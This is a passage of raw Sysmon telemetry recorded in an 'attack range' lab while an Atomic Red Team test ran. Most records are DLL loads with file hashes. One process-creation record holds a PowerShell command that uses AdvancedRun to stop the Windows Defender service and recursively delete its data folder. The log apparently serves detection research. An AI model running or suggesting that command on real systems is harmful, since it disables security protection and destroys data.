Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User 
Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003942473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 
(rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003942466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER 
API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.952{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003942456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003942454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT 
BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003942450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 
10341000x80000000000000003942449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-1F03-000000002702}21201092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\
assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003942448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.948{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-EB14-61EA-1F03-000000002702}2120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003942447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003942440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.937{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003942438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 